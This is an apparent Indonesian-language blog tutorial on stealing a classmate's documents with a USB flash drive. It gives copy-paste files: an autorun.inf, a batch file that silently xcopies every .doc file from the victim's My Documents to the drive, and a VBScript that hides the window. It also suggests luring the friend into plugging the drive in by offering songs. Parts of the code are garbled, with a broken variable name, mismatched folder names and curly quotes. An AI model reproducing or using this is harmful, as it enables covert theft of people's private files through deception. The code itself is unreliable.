Cara Mencuri Data Komputer

Cara Mencuri Data Komputer

Cara mencuri data komputer, Ok, bayangkan anda sedang menghadapi ujian terakhir, dan anda belum siap, tetapi teman anda punya jawaban atau catatan penting di laptop atau di komputernya tapi tidak mau berbagi dengan anda, dan teman anda ini sedikit goblok, dan anda pengen mencuri isi dokumen aneka cara komputer yang berada di komputernya.

Membawa Flashdisk Gantung Dileher

Cara mencuri data di komputernya adalah dengan pergi ke rumahnya di malam hari dengan membawa flashdisk yang digantung dileher anda, dan sembunyi-sembunyi masuk ke kamarnya dan mengcopy isi

dokumen di hardisk nya, jadi pencuri beneran nih? hehehehe. atau alternatif lain, kita kan temenan yah ceritanya, jadi bilang ajah gini ama dia, “Teman, aku punya lagu baru ini di flashdisk gue? mau copy ngga?” nah lalu kita copykan lagu nya ke komputer dia. (sssttt diam2 yah!) kita mulai mencuri data komputer.

Langkah Yang Harus Dilakukan

Kayaknya cara mencuri data komputer yang pertama diatas dengan menjadi pencuri beneran nggak enak yah? Fakta berkata lain hehehe. langsung saja kita pake cara halus. ikuti langkah2 berikut :

Sebelumnya siapkan dahulu flashdisk kita (kalo bisa isinya besar)

Langkah ke-1

Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shellopencommand=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2

Buka Notepad lagi dan copas kode berikut :

@echo off
:: variables
/min
SET drive=%drive:~0,2%
set backup cmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%My Documents*.doc”
“%drive%alldoc”
@echo off
cls
Simpan di flashdisk anda dengan nama : file.bat

Langkah ke-3

Buka Notepad lagi dan copas kode berikut :

CreateObject(“Wscript.Shell”).Run “”””
& WScript.Arguments(0) & “”””, 0, False
Simpan di flashdisk anda dengan nama : invisible.vbs

Langkah ke-4

Buka Notepad lagi dan copas lagi kode berikut :

wscript.exe invisible.vbs file.bat
Simpan di flashdisk anda dengan nama : launch.bat

Menyimpan Hasil Curian

Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama Allah untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah : %backup cmd% “%USERPROFILE%My Documents*.doc” “%drive%alldoc”, akan menyalin semua file berekstensi .doc ke dalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita di komputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri data di komputer teman, coba dulu flashdisk kita di komputer kita sendiri, melihat apakah bekerja dengan baik. Selamat mencoba cara mencuri data komputer.

]]>

Leave a Reply

Your email address will not be published. Required fields are marked *